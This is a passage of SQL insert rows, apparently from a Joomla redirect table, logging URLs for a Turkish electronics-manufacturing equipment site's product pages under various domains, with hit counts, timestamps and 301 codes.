00:00:00',301),(4838,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',1,0,'2014-08-28 00:24:48','0000-00-00 00:00:00',301),(4839,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',2,0,'2014-08-28 00:25:21','0000-00-00 00:00:00',301),(4840,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',2,0,'2014-08-28 00:25:54','0000-00-00 00:00:00',301),(4841,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',1,0,'2014-08-28 00:26:04','0000-00-00 00:00:00',301),(4842,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',4,0,'2014-08-28 00:27:02','0000-00-00 00:00:00',301),(4843,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',2,0,'2014-08-28 00:28:09','0000-00-00 00:00:00',301),(4844,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',2,0,'2014-08-28 00:28:41','0000-00-00 00:00:00',301),(4845,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',2,0,'2014-08-28 00:29:10','0000-00-00 00:00:00',301),(4846,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default','','','',2,0,'2014-08-28 00:29:43','0000-00-00 00:00:00',301),(4847,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',3,0,'2014-08-28 00:30:16','0000-00-00 00:00:00',301),(4848,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',2,0,'2014-08-28 00:31:21','0000-00-00 00:00:00',301),(4849,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',2,0,'2014-08-28 00:32:27','0000-00-00 00:00:00',301),(4850,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',2,0,'2014-08-28 00:33:00','0000-00-00 00:00:00',301),(4851,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',4,0,'2014-08-28 00:34:05','0000-00-00 00:00:00',301),(4852,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',2,0,'2014-08-28 00:35:11','0000-00-00 00:00:00',301),(4853,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',4,0,'2014-08-28 00:35:44','0000-00-00 00:00:00',301),(4854,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117','','','',1,0,'2014-08-28 00:36:49','0000-00-00 00:00:00',301),(4855,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',2,0,'2014-08-28 00:37:55','0000-00-00 00:00:00',301),(4856,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',1,0,'2014-08-28 00:41:44','0000-00-00 00:00:00',301),(4857,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',1,0,'2014-08-28 00:43:13','0000-00-00 00:00:00',301),(4858,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',3,0,'2014-08-28 00:45:33','0000-00-00 00:00:00',301),(4859,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',1,0,'2014-08-28 00:46:06','0000-00-00 00:00:00',301),(4860,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',4,0,'2014-08-28 00:46:41','0000-00-00 00:00:00',301),(4861,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',2,0,'2014-08-28 01:02:42','0000-00-00 00:00:00',301),(4862,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',2,0,'2014-08-28 01:04:22','0000-00-00 00:00:00',301),(4863,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default','','','',1,0,'2014-08-28 01:07:04','0000-00-00 00:00:00',301),(4864,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37','','','',1,0,'2014-08-28 01:08:43','0000-00-00 00:00:00',301),(4865,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',3,0,'2014-08-28 01:13:05','0000-00-00 00:00:00',301),(4866,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2','','','',1,0,'2014-08-28 01:15:16','0000-00-00 00:00:00',301),(4867,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-08-28 01:16:23','0000-00-00 00:00:00',301),(4868,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',2,0,'2014-08-28 01:16:55','0000-00-00 00:00:00',301),(4869,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default','','','',2,0,'2014-08-28 01:17:29','0000-00-00 00:00:00',301),(4870,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41%3Asmd-firin&Itemid=55&layout=default&lang=tr','','','',1,0,'2014-08-28 01:17:49','0000-00-00 00:00:00',301),(4871,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133','','','',2,0,'2014-08-28 01:18:01','0000-00-00 00:00:00',301),(4872,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130','','','',1,0,'2014-08-28 01:19:38','0000-00-00 00:00:00',301),(4873,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151','','','',1,0,'2014-08-28 01:21:17','0000-00-00 00:00:00',301),(4874,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',2,0,'2014-08-28 01:21:50','0000-00-00 00:00:00',301),(4875,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',2,0,'2014-08-28 01:22:22','0000-00-00 00:00:00',301),(4876,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153','','','',1,0,'2014-08-28 01:22:55','0000-00-00 00:00:00',301),(4877,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-08-28 01:23:30','0000-00-00 00:00:00',301),(4878,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',2,0,'2014-08-28 01:24:00','0000-00-00 00:00:00',301),(4879,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',1,0,'2014-08-28 01:24:34','0000-00-00 00:00:00',301),(4880,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-28 01:26:12','0000-00-00 00:00:00',301),(4881,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',2,0,'2014-08-28 01:26:44','0000-00-00 00:00:00',301),(4882,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110','','','',1,0,'2014-08-28 01:27:17','0000-00-00 00:00:00',301),(4883,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',1,0,'2014-08-28 01:27:19','0000-00-00 00:00:00',301),(4884,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-08-28 01:27:27','0000-00-00 00:00:00',301),(4885,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',2,0,'2014-08-28 01:28:23','0000-00-00 00:00:00',301),(4886,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',2,0,'2014-08-28 01:28:55','0000-00-00 00:00:00',301),(4887,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',2,0,'2014-08-28 01:30:34','0000-00-00 00:00:00',301),(4888,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',2,0,'2014-08-28 01:32:15','0000-00-00 00:00:00',301),(4889,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',4,0,'2014-08-28 01:33:29','0000-00-00 00:00:00',301),(4890,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',3,0,'2014-08-28 02:05:15','0000-00-00 00:00:00',301),(4891,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118','','','',2,0,'2014-08-28 02:06:22','0000-00-00 00:00:00',301),(4892,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',2,0,'2014-08-28 02:07:26','0000-00-00 00:00:00',301),(4893,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151','','','',2,0,'2014-08-28 02:07:59','0000-00-00 00:00:00',301),(4894,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',2,0,'2014-08-28 02:10:43','0000-00-00 00:00:00',301),(4895,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',2,0,'2014-08-28 02:13:59','0000-00-00 00:00:00',301),(4896,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',4,0,'2014-08-28 02:17:06','0000-00-00 00:00:00',301),(4897,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',2,0,'2014-08-28 02:17:16','0000-00-00 00:00:00',301),(4898,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',2,0,'2014-08-28 02:19:27','0000-00-00 00:00:00',301),(4899,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126','','','',1,0,'2014-08-28 02:20:32','0000-00-00 00:00:00',301),(4900,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',2,0,'2014-08-28 02:22:11','0000-00-00 00:00:00',301),(4901,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152','','','',2,0,'2014-08-28 02:23:16','0000-00-00 00:00:00',301),(4902,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119','','','',3,0,'2014-08-28 02:24:15','0000-00-00 00:00:00',301),(4903,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',1,0,'2014-08-28 02:24:22','0000-00-00 00:00:00',301),(4904,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',3,0,'2014-08-28 02:26:00','0000-00-00 00:00:00',301),(4905,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',2,0,'2014-08-28 03:00:45','0000-00-00 00:00:00',301),(4906,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',2,0,'2014-08-28 03:03:16','0000-00-00 00:00:00',301),(4907,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',2,0,'2014-08-28 03:18:28','0000-00-00 00:00:00',301),(4908,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60','','','',1,0,'2014-08-28 03:19:44','0000-00-00 00:00:00',301),(4909,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',2,0,'2014-08-28 03:21:00','0000-00-00 00:00:00',301),(4910,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',2,0,'2014-08-28 03:23:33','0000-00-00 00:00:00',301),(4911,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122','','','',1,0,'2014-08-28 03:24:49','0000-00-00 00:00:00',301),(4912,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',4,0,'2014-08-28 03:26:05','0000-00-00 00:00:00',301),(4913,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',2,0,'2014-08-28 03:36:13','0000-00-00 00:00:00',301),(4914,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-08-28 03:37:29','0000-00-00 00:00:00',301),(4915,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',3,0,'2014-08-28 03:45:05','0000-00-00 00:00:00',301),(4916,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',2,0,'2014-08-28 03:48:54','0000-00-00 00:00:00',301),(4917,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',3,0,'2014-08-28 03:50:10','0000-00-00 00:00:00',301),(4918,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',4,0,'2014-08-28 03:52:42','0000-00-00 00:00:00',301),(4919,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',2,0,'2014-08-28 03:53:58','0000-00-00 00:00:00',301),(4920,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default','','','',2,0,'2014-08-28 03:55:14','0000-00-00 00:00:00',301),(4921,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',1,0,'2014-08-28 03:59:02','0000-00-00 00:00:00',301),(4922,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',4,0,'2014-08-28 04:00:18','0000-00-00 00:00:00',301),(4923,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124','','','',2,0,'2014-08-28 04:04:07','0000-00-00 00:00:00',301),(4924,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',2,0,'2014-08-28 04:05:23','0000-00-00 00:00:00',301),(4925,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',2,0,'2014-08-28 04:06:38','0000-00-00 00:00:00',301),(4926,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',4,0,'2014-08-28 04:07:54','0000-00-00 00:00:00',301),(4927,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',2,0,'2014-08-28 04:11:43','0000-00-00 00:00:00',301),(4928,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',2,0,'2014-08-28 04:14:15','0000-00-00 00:00:00',301),(4929,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',2,0,'2014-08-28 04:16:47','0000-00-00 00:00:00',301),(4930,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',2,0,'2014-08-28 04:18:07','0000-00-00 00:00:00',301),(4931,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',2,0,'2014-08-28 04:21:51','0000-00-00 00:00:00',301),(4932,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',2,0,'2014-08-28 04:25:39','0000-00-00 00:00:00',301),(4933,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',1,0,'2014-08-28 04:26:57','0000-00-00 00:00:00',301),(4934,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',1,0,'2014-08-28 04:29:27','0000-00-00 00:00:00',301),(4935,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',2,0,'2014-08-28 04:31:59','0000-00-00 00:00:00',301),(4936,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',3,0,'2014-08-28 04:37:04','0000-00-00 00:00:00',301),(4937,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',38,0,'2014-08-28 04:42:00','0000-00-00 00:00:00',301),(4938,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',1,0,'2014-08-28 04:44:40','0000-00-00 00:00:00',301),(4939,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=0&lang=en','','','',1,0,'2014-08-28 05:17:20','0000-00-00 00:00:00',301),(4940,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',2,0,'2014-08-28 05:54:24','0000-00-00 00:00:00',301),(4941,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',4,0,'2014-08-28 05:56:55','0000-00-00 00:00:00',301),(4942,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',1,0,'2014-08-28 06:39:28','0000-00-00 00:00:00',301),(4943,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',2,0,'2014-08-28 07:05:22','0000-00-00 00:00:00',301),(4944,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134','','','',2,0,'2014-08-28 07:30:43','0000-00-00 00:00:00',301),(4945,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',27,0,'2014-08-28 07:31:39','0000-00-00 00:00:00',301),(4946,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',5,0,'2014-08-28 08:03:55','0000-00-00 00:00:00',301),(4947,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',4,0,'2014-08-28 08:11:45','0000-00-00 00:00:00',301),(4948,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125','','','',3,0,'2014-08-28 08:32:00','0000-00-00 00:00:00',301),(4949,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',2,0,'2014-08-28 09:09:21','0000-00-00 00:00:00',301),(4950,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-08-28 09:39:07','0000-00-00 00:00:00',301),(4951,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56','','','',1,0,'2014-08-28 09:50:44','0000-00-00 00:00:00',301),(4952,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-28 09:51:23','0000-00-00 00:00:00',301),(4953,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-08-28 10:12:50','0000-00-00 00:00:00',301),(4954,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-28 10:22:24','0000-00-00 00:00:00',301),(4955,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',1,0,'2014-08-28 10:30:55','0000-00-00 00:00:00',301),(4956,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-28 10:53:20','0000-00-00 00:00:00',301),(4957,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',3,0,'2014-08-28 11:14:41','0000-00-00 00:00:00',301),(4958,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-28 11:15:58','0000-00-00 00:00:00',301),(4959,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-28 11:31:05','0000-00-00 00:00:00',301),(4960,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',1,0,'2014-08-28 11:42:47','0000-00-00 00:00:00',301),(4961,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',5,0,'2014-08-28 11:48:57','0000-00-00 00:00:00',301),(4962,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',2,0,'2014-08-28 12:43:49','0000-00-00 00:00:00',301),(4963,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=0&lang=tr','','','',1,0,'2014-08-28 13:19:51','0000-00-00 00:00:00',301),(4964,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',1,0,'2014-08-28 13:25:10','0000-00-00 00:00:00',301),(4965,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-08-28 13:31:41','0000-00-00 00:00:00',301),(4966,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-08-28 13:53:38','0000-00-00 00:00:00',301),(4967,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=&lang=en','','','',1,0,'2014-08-28 14:36:38','0000-00-00 00:00:00',301),(4968,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',2,0,'2014-08-28 14:38:27','0000-00-00 00:00:00',301),(4969,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',2,0,'2014-08-28 14:42:59','0000-00-00 00:00:00',301),(4970,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-28 14:50:47','0000-00-00 00:00:00',301),(4971,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-28 16:28:11','0000-00-00 00:00:00',301),(4972,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-28 16:37:47','0000-00-00 00:00:00',301),(4973,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=0&lang=tr','','','',1,0,'2014-08-28 16:42:49','0000-00-00 00:00:00',301),(4974,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=0&lang=en','','','',1,0,'2014-08-28 16:44:34','0000-00-00 00:00:00',301),(4975,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-28 18:37:26','0000-00-00 00:00:00',301),(4976,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-28 18:41:39','0000-00-00 00:00:00',301),(4977,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-28 18:54:23','0000-00-00 00:00:00',301),(4978,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',2,0,'2014-08-28 18:59:58','0000-00-00 